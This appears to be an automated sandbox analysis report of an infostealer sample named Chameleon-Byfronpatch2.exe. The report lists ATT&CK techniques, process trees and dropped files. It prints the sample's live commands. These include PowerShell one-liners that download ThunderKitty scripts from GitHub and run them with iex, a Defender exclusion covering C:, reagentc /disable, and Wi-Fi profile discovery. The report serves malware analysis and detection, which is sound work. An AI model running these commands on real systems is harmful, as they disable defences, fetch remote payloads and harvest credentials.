585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb

Analysis

max time kernel
35s
max time network
37s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
14/08/2024, 22:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Chameleon-Byfronpatch2.exe
Size

9.2MB
MD5

addbf6301c1ea797554a0152da23d5ae
SHA1

01a22ed2bb77ff84546147098348a07bc0eecbc6
SHA256

585c788d34f68b6fdc7695d5752e6450ae5f3e2c7dfd0dabaafefc598b29ecdb
SHA512

9507a56c571d1f9ddf67dd9b5200c340416b00bb956c52fa88b8cd2108d5f789cdf5c04d60aa06c5c9bde8bec2e6a324c89435eec57708e1f66fd0a98c767a11
SSDEEP

98304:NLTHcOdLkG6nUDvQlPU68hkY8LdYwTE/zTPy2R0r:mOdLkG9TChA/zLc

Score

9^/10

credential_access discovery evasion execution persistence privilege_escalation spyware stealer

Malware Config

Signatures

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1572	powershell.exe
6	3604	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1572	powershell.exe
3604	powershell.exe
3248	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Drivers\etc\hosts	Chameleon-Byfronpatch2.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
4460	netsh.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
4	raw.githubusercontent.com
5	raw.githubusercontent.com
6	raw.githubusercontent.com

Network Service Discovery 1 TTPs 1 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
2528	ARP.EXE

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	reagentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	reagentc.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\ReAgent\ReAgent.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\setuperr.log	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagerr.xml	reagentc.exe
File opened for modification	C:\Windows\Panther\UnattendGC\diagwrn.xml	reagentc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 9 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
468	netsh.exe
1440	netsh.exe

System Network Connections Discovery 1 TTPs 1 IoCs

Attempt to get a listing of network connections.

discovery

System Network Connections Discovery

T1049

pid	Process
732	NETSTAT.EXE

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
536	ipconfig.exe
732	NETSTAT.EXE
1424	ipconfig.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1572	powershell.exe
3604	powershell.exe
3248	powershell.exe
1572	powershell.exe
3248	powershell.exe
3604	powershell.exe
3604	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1572	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	3248	powershell.exe
Token: SeIncreaseQuotaPrivilege	3604	powershell.exe
Token: SeSecurityPrivilege	3604	powershell.exe
Token: SeTakeOwnershipPrivilege	3604	powershell.exe
Token: SeLoadDriverPrivilege	3604	powershell.exe
Token: SeSystemProfilePrivilege	3604	powershell.exe
Token: SeSystemtimePrivilege	3604	powershell.exe
Token: SeProfSingleProcessPrivilege	3604	powershell.exe
Token: SeIncBasePriorityPrivilege	3604	powershell.exe
Token: SeCreatePagefilePrivilege	3604	powershell.exe
Token: SeBackupPrivilege	3604	powershell.exe
Token: SeRestorePrivilege	3604	powershell.exe
Token: SeShutdownPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeSystemEnvironmentPrivilege	3604	powershell.exe
Token: SeRemoteShutdownPrivilege	3604	powershell.exe
Token: SeUndockPrivilege	3604	powershell.exe
Token: SeManageVolumePrivilege	3604	powershell.exe
Token: 33	3604	powershell.exe
Token: 34	3604	powershell.exe
Token: 35	3604	powershell.exe
Token: 36	3604	powershell.exe
Token: SeIncreaseQuotaPrivilege	3604	powershell.exe
Token: SeSecurityPrivilege	3604	powershell.exe
Token: SeTakeOwnershipPrivilege	3604	powershell.exe
Token: SeLoadDriverPrivilege	3604	powershell.exe
Token: SeSystemProfilePrivilege	3604	powershell.exe
Token: SeSystemtimePrivilege	3604	powershell.exe
Token: SeProfSingleProcessPrivilege	3604	powershell.exe
Token: SeIncBasePriorityPrivilege	3604	powershell.exe
Token: SeCreatePagefilePrivilege	3604	powershell.exe
Token: SeBackupPrivilege	3604	powershell.exe
Token: SeRestorePrivilege	3604	powershell.exe
Token: SeShutdownPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeSystemEnvironmentPrivilege	3604	powershell.exe
Token: SeRemoteShutdownPrivilege	3604	powershell.exe
Token: SeUndockPrivilege	3604	powershell.exe
Token: SeManageVolumePrivilege	3604	powershell.exe
Token: 33	3604	powershell.exe
Token: 34	3604	powershell.exe
Token: 35	3604	powershell.exe
Token: 36	3604	powershell.exe
Token: SeIncreaseQuotaPrivilege	3604	powershell.exe
Token: SeSecurityPrivilege	3604	powershell.exe
Token: SeTakeOwnershipPrivilege	3604	powershell.exe
Token: SeLoadDriverPrivilege	3604	powershell.exe
Token: SeSystemProfilePrivilege	3604	powershell.exe
Token: SeSystemtimePrivilege	3604	powershell.exe
Token: SeProfSingleProcessPrivilege	3604	powershell.exe
Token: SeIncBasePriorityPrivilege	3604	powershell.exe
Token: SeCreatePagefilePrivilege	3604	powershell.exe
Token: SeBackupPrivilege	3604	powershell.exe
Token: SeRestorePrivilege	3604	powershell.exe
Token: SeShutdownPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeSystemEnvironmentPrivilege	3604	powershell.exe
Token: SeRemoteShutdownPrivilege	3604	powershell.exe
Token: SeUndockPrivilege	3604	powershell.exe
Token: SeManageVolumePrivilege	3604	powershell.exe
Token: 33	3604	powershell.exe
Token: 34	3604	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 3092 wrote to memory of 3888	3092	Chameleon-Byfronpatch2.exe	84
PID 3092 wrote to memory of 3888	3092	Chameleon-Byfronpatch2.exe	84
PID 3092 wrote to memory of 3248	3092	Chameleon-Byfronpatch2.exe	86
PID 3092 wrote to memory of 3248	3092	Chameleon-Byfronpatch2.exe	86
PID 3092 wrote to memory of 1572	3092	Chameleon-Byfronpatch2.exe	87
PID 3092 wrote to memory of 1572	3092	Chameleon-Byfronpatch2.exe	87
PID 3092 wrote to memory of 1248	3092	Chameleon-Byfronpatch2.exe	89
PID 3092 wrote to memory of 1248	3092	Chameleon-Byfronpatch2.exe	89
PID 3092 wrote to memory of 3604	3092	Chameleon-Byfronpatch2.exe	91
PID 3092 wrote to memory of 3604	3092	Chameleon-Byfronpatch2.exe	91
PID 3092 wrote to memory of 1172	3092	Chameleon-Byfronpatch2.exe	90
PID 3092 wrote to memory of 1172	3092	Chameleon-Byfronpatch2.exe	90
PID 1248 wrote to memory of 4244	1248	cmd.exe	96
PID 1248 wrote to memory of 4244	1248	cmd.exe	96
PID 1572 wrote to memory of 2356	1572	powershell.exe	97
PID 1572 wrote to memory of 2356	1572	powershell.exe	97
PID 3604 wrote to memory of 1516	3604	powershell.exe	98
PID 3604 wrote to memory of 1516	3604	powershell.exe	98
PID 2356 wrote to memory of 4816	2356	csc.exe	100
PID 2356 wrote to memory of 4816	2356	csc.exe	100
PID 1516 wrote to memory of 4200	1516	csc.exe	99
PID 1516 wrote to memory of 4200	1516	csc.exe	99
PID 3604 wrote to memory of 1440	3604	powershell.exe	104
PID 3604 wrote to memory of 1440	3604	powershell.exe	104
PID 3604 wrote to memory of 1532	3604	powershell.exe	106
PID 3604 wrote to memory of 1532	3604	powershell.exe	106
PID 1532 wrote to memory of 2200	1532	net.exe	107
PID 1532 wrote to memory of 2200	1532	net.exe	107
PID 3604 wrote to memory of 4460	3604	powershell.exe	108
PID 3604 wrote to memory of 4460	3604	powershell.exe	108
PID 3604 wrote to memory of 4628	3604	powershell.exe	109
PID 3604 wrote to memory of 4628	3604	powershell.exe	109
PID 3604 wrote to memory of 4296	3604	powershell.exe	110
PID 3604 wrote to memory of 4296	3604	powershell.exe	110
PID 4296 wrote to memory of 3284	4296	net.exe	111
PID 4296 wrote to memory of 3284	4296	net.exe	111
PID 3604 wrote to memory of 536	3604	powershell.exe	112
PID 3604 wrote to memory of 536	3604	powershell.exe	112
PID 3604 wrote to memory of 4516	3604	powershell.exe	113
PID 3604 wrote to memory of 4516	3604	powershell.exe	113
PID 4516 wrote to memory of 2772	4516	net.exe	114
PID 4516 wrote to memory of 2772	4516	net.exe	114
PID 3604 wrote to memory of 4444	3604	powershell.exe	115
PID 3604 wrote to memory of 4444	3604	powershell.exe	115
PID 3604 wrote to memory of 732	3604	powershell.exe	116
PID 3604 wrote to memory of 732	3604	powershell.exe	116
PID 3604 wrote to memory of 4036	3604	powershell.exe	117
PID 3604 wrote to memory of 4036	3604	powershell.exe	117
PID 3604 wrote to memory of 1424	3604	powershell.exe	118
PID 3604 wrote to memory of 1424	3604	powershell.exe	118
PID 3604 wrote to memory of 3508	3604	powershell.exe	119
PID 3604 wrote to memory of 3508	3604	powershell.exe	119
PID 3604 wrote to memory of 2528	3604	powershell.exe	120
PID 3604 wrote to memory of 2528	3604	powershell.exe	120
PID 3604 wrote to memory of 468	3604	powershell.exe	121
PID 3604 wrote to memory of 468	3604	powershell.exe	121

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3888	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe
"C:\Users\Admin\AppData\Local\Temp\Chameleon-Byfronpatch2.exe"
1⤵
- Drops file in Drivers directory
- Suspicious use of WriteProcessMemory
PID:3092
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
  2⤵
  - Views/modifies file attributes
  PID:3888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C "Add-MpPreference -ExclusionPath 'C:'"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/defenderstuff.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1572
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ck4j3qun\ck4j3qun.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2356
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES884B.tmp" "c:\Users\Admin\AppData\Local\Temp\ck4j3qun\CSCE29A78D6915B477BB60EC7673D5536A.TMP"
      4⤵
      PID:4816
- C:\Windows\system32\cmd.exe
  cmd /c rundll32.exe user32.dll,SwapMouseButton
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1248
- - C:\Windows\system32\rundll32.exe
    rundll32.exe user32.dll,SwapMouseButton
    3⤵
    PID:4244
- C:\Windows\system32\reagentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  PID:1172
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('https://raw.githubusercontent.com/EvilBytecode/ThunderKitty/main/powershellstuff/SysInfo.ps1')|iex"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3604
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yiu3g3hy\yiu3g3hy.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1516
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES884A.tmp" "c:\Users\Admin\AppData\Local\Temp\yiu3g3hy\CSCAEA17C88F88548B181CCF043C43D4EE6.TMP"
      4⤵
      PID:4200
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profiles
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:1440
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup administrators
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup administrators
      4⤵
      PID:2200
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" advfirewall show allprofiles
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:4460
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /all
    3⤵
    PID:4628
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" user
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 user
      4⤵
      PID:3284
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /displaydns
    3⤵
    - Gathers network information
    PID:536
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4516
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup
      4⤵
      PID:2772
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" startup get command caption
    3⤵
    PID:4444
- - C:\Windows\system32\NETSTAT.EXE
    "C:\Windows\system32\NETSTAT.EXE" -ano
    3⤵
    - System Network Connections Discovery
    - Gathers network information
    PID:732
- - C:\Windows\System32\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,productState,pathToSignedProductExe
    3⤵
    PID:4036
- - C:\Windows\system32\ipconfig.exe
    "C:\Windows\system32\ipconfig.exe" /all
    3⤵
    - Gathers network information
    PID:1424
- - C:\Windows\system32\ROUTE.EXE
    "C:\Windows\system32\ROUTE.EXE" print
    3⤵
    PID:3508
- - C:\Windows\system32\ARP.EXE
    "C:\Windows\system32\ARP.EXE" -a
    3⤵
    - Network Service Discovery
    PID:2528
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    - Event Triggered Execution: Netsh Helper DLL
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Permission Groups Discovery

T1069

Local Groups

T1069.001

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

System Network Connections Discovery

T1049

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fd9bed4029d8384096b7b50cca5aac9c

SHA1
d93fe3e4884745db9da9be6c3f3c37ccf02f664c

SHA256
c5d5170550a8f39706e5e9606357b63c43f156a7f0e541988c8c75157564c9d4

SHA512
322f223f0090c49417a7b72f6fc0f09038bc12063b58f25c19f86117c3ebb97eae8278cce4699a980ba150a61679d14828adf702bf97a1ec4e7ac7417df4d681

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
207220e5f34e5f5604b11ce456587eb5

SHA1
65bf46f552577985dba632d15073f699690889ba

SHA256
0501bd1f69ac3b6598cd63b3f0ea44e0d52b71519d0ce4afe7922caa8bea59f9

SHA512
2f52d8fb018db19ed6ce8a7f3b4b7a330bf49bb1b185d3cb7e00c9287dce9705490e1fd9fa5899376a74f84c7a744eaef6d8a618e20c1f55962f58cce2d73e3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES884A.tmp

Filesize
1KB

MD5
eecd9a765f47a43d94846d2712053025

SHA1
5587fc3ec876555a20171135d022c5a57e6c746b

SHA256
b1991237a58fea9aee4551201934c0725413393d63f1ce33e4467b75340162b2

SHA512
e3d09e219a57b835af42adcbc83bc62737f5b59e267bc8e02d8bc8a551370e16b02fdf4b343b153f2684dcf3c3bf08e01a9af89369971df258b56c81536ab2f3

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES884B.tmp

Filesize
1KB

MD5
7f2bb70173373a2649e385c2e6f4c363

SHA1
2e9b61721817ba40ad4b0ee856698d779b2090a0

SHA256
1ecb516b45e17b41245a74ea3df353301079fd476b7082ae594ae8d11308c839

SHA512
6905fec8ccae43f29a91e755591a04cc722d85ae1d5fc47297c41308fbb4bedd4cc11fa87a8a3bedb48eedf29b73859db19cce747e367056dc9df07f3ea7e0cc

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty.zip

Filesize
67KB

MD5
56831369a0738d63cbfad207a7d4a72c

SHA1
b285492a29c82a312a2353ced6bb84d79d90403f

SHA256
733511e746d97454f84840b979dd6ac7010b39bbaf3d33f9d9db645f67adb165

SHA512
fe67b3292a89c92467d6d3ecae9a0d87a36c7535b92cda4138aca6a10cff228e601d0f8122bef20f263e4b7b964315547b2cde27c38ca72421779ec4e61a0200

Download Submit
C:\Users\Admin\AppData\Local\Temp\ThunderKitty\SystemInfo\ThunderKitty-ScrapedCMDS.txt

Filesize
56KB

MD5
f56671d9137c121b6697e150f61fc128

SHA1
2171be119c80aa98037d85342999f66e86b1faef

SHA256
a67363f5da0353afe60b5eb400a3005ccb9e0015f39bd17c0e0d17e52186fd45

SHA512
623576b903946064acab552e757db4473adb00ba3b3505e9dab0ed05090defca4bc690f88de049fd293482b0fe4418b168172dc54638779f6912fc74598286cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mv3bibr5.2h5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ck4j3qun\ck4j3qun.dll

Filesize
4KB

MD5
92dd9934b95e1f889d4041a16eb1f394

SHA1
a2706de0f003f32b348761d12e061b1ce88dd862

SHA256
013162536cf263664d6ca32cd17b5b0f8171b3652bfc6241d5b16b98aeefd863

SHA512
54557f8c39bc169dde731d59da089b062cf9c68a6e08090ef80da17d6b95531fc6ecd71d83f3ea52e32b168dd0e93594bc435324fabf3590eb5b79d32699a39d

Download Submit
C:\Users\Admin\AppData\Local\Temp\yiu3g3hy\yiu3g3hy.dll

Filesize
4KB

MD5
82a3b21d78985e4a5eab1ace32f867e4

SHA1
1b4c924f60accfd975fda1a837074e9dab627999

SHA256
1f397aaf2f1c41cb8a21ba471b4c7ec2d2bebe141515ed47ddc563f4f0290fa0

SHA512
0f674c1abd66bf7cbd90fe4f8f261c8ddd4ec6202a5550d7d6d88a43786eef792ba12c170d9c9993b404527254bda88864ee80a999fd5dbd1c44ae3a2fabb53d

Download Submit
C:\Users\Admin\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1

Filesize
2KB

MD5
9758656bbe8589c66bb241b052490c72

SHA1
b73da83fb3ae6b86c6365769a04de9845d5c602c

SHA256
e4bfe191530cc53138c4a265755539f8a115f7828faba79dfac91f3184b26351

SHA512
da9a8ecba8c2071e467f2d72fac524843fb0011c8486dd95e8b948b1c7f91bf02bcb80c20a01eddb6971b96db5ebde5f7c4c607e6b6d15e75d971ea104436e34

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
2KB

MD5
33963639fb0ee0d79107103504711c9e

SHA1
b5c525632b94582ac863c600bc613ab658fab61b

SHA256
c2d71376ebf448ca83881ffed011973822c8f755a563b1087214bf571692ad89

SHA512
b61a4f6b3a81aac3dd9a35d837232562c5d927647a639ef6eb728479f947d63f32889371f438b3bbf075ec9bbbe81cd0b06c4647d4329d74eaa4dc979ad6787d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ck4j3qun\CSCE29A78D6915B477BB60EC7673D5536A.TMP

Filesize
652B

MD5
5e2f05ed16da0c227114b09d0ebc0118

SHA1
e4b98f096e02b2aaa49572337b400b5ae700dbc7

SHA256
0d52fc9bd5407fe4089df8c1f080af050b6023b9f7f0a503dbe49d6dcd3dd73b

SHA512
8bc82f683908f8274f8789c77a8ce4a40550c7207ac8c542187d95362c871ee6fe8b0da4a46144219beeb0dc6c693674be5b86d04a58e0878bbf477066c8eeff

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ck4j3qun\ck4j3qun.cmdline

Filesize
369B

MD5
070c9c6d1a0aa9e145abd3f99676536d

SHA1
9c4b9cba18b6058dd1c0415dc6429bb762999768

SHA256
743436977ab0bf7e9d76abe709181c27a57430bcceff057d003a265be38defa7

SHA512
b0864d6d9f28dbdd0149b8fd4d23c237fa664cff2235b0e5669e2d33a6b84a4f156f4b72194a214e5494156cf0de1ac8b1ce9a2a93fc74fcb480df9e8d7cb0f4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yiu3g3hy\CSCAEA17C88F88548B181CCF043C43D4EE6.TMP

Filesize
652B

MD5
9be5b6647e290a33ef87e15785608524

SHA1
ed3eddcc66bf1dec7bddfe2b863172c69cbc66f9

SHA256
596b6cf771f2c6774f2e1f9b48e789c575aa34dd18bd135fbb114b066c58a825

SHA512
0ec0662f7d95378709d1351467dd3cd28ffe8aaf61394d755b23596cb96fbf99031659f593b789c3ac065845636df57ee7b5b1bb9622c32fb1d31b5ee1317b6c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yiu3g3hy\yiu3g3hy.0.cs

Filesize
1KB

MD5
8a1e7edb2117ec5dde9a07016905923b

SHA1
0155dbeeb16333e2eaa767b0209750efee56f47f

SHA256
c379ac84c970f2055851b084c44575a5e4b5a70dc25f0acdd49aad306489b007

SHA512
4ff0601803a006c661c962fe158cd5e9f40031d6b4fd7c5a05969a52d812e1fcb0aab20916fcad6c61c6d44cc7cfdf1e4f344f22ced937a0cd757ad841d3ab21

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yiu3g3hy\yiu3g3hy.cmdline

Filesize
369B

MD5
996b5d8f9bf6fa2e454623245253c9b8

SHA1
d70c8af64c7f6b161664d98729d3745af3eefd7a

SHA256
5317a5f12b0e902e5821f57be3c4cc0e7ae4711f6a1d7ba6e5c8f7fd2a331f0d

SHA512
6d615899d4484f9ee45cf65f8c1b889b6e5a560de1ed07d52e9358e5de13f30c1ea83881c9d8d6cf2210ee314bf684cb485f9e5c361bbe4c301a680c5c547b34

Download Submit
memory/1572-16-0x000001434D120000-0x000001434D142000-memory.dmp

Filesize
136KB

Download
memory/1572-63-0x000001434D110000-0x000001434D118000-memory.dmp

Filesize
32KB

Download
memory/1572-2-0x00007FF820BB3000-0x00007FF820BB5000-memory.dmp

Filesize
8KB

Download
memory/1572-4-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/1572-121-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/1572-120-0x000001434CDD0000-0x000001434CFEC000-memory.dmp

Filesize
2.1MB

Download
memory/1572-17-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/3248-53-0x00000201CDBD0000-0x00000201CDDEC000-memory.dmp

Filesize
2.1MB

Download
memory/3604-83-0x000001B8C4570000-0x000001B8C4594000-memory.dmp

Filesize
144KB

Download
memory/3604-20-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/3604-39-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/3604-40-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
memory/3604-70-0x000001B8C3A00000-0x000001B8C3A08000-memory.dmp

Filesize
32KB

Download
memory/3604-123-0x000001B8C4540000-0x000001B8C4552000-memory.dmp

Filesize
72KB

Download
memory/3604-124-0x000001B8C4430000-0x000001B8C443A000-memory.dmp

Filesize
40KB

Download
memory/3604-125-0x000001B8C3A20000-0x000001B8C3C3C000-memory.dmp

Filesize
2.1MB

Download
memory/3604-82-0x000001B8C4570000-0x000001B8C459A000-memory.dmp

Filesize
168KB

Download
memory/3604-134-0x000001B8C3A20000-0x000001B8C3C3C000-memory.dmp

Filesize
2.1MB

Download
memory/3604-135-0x00007FF820BB0000-0x00007FF821671000-memory.dmp

Filesize
10.8MB

Download
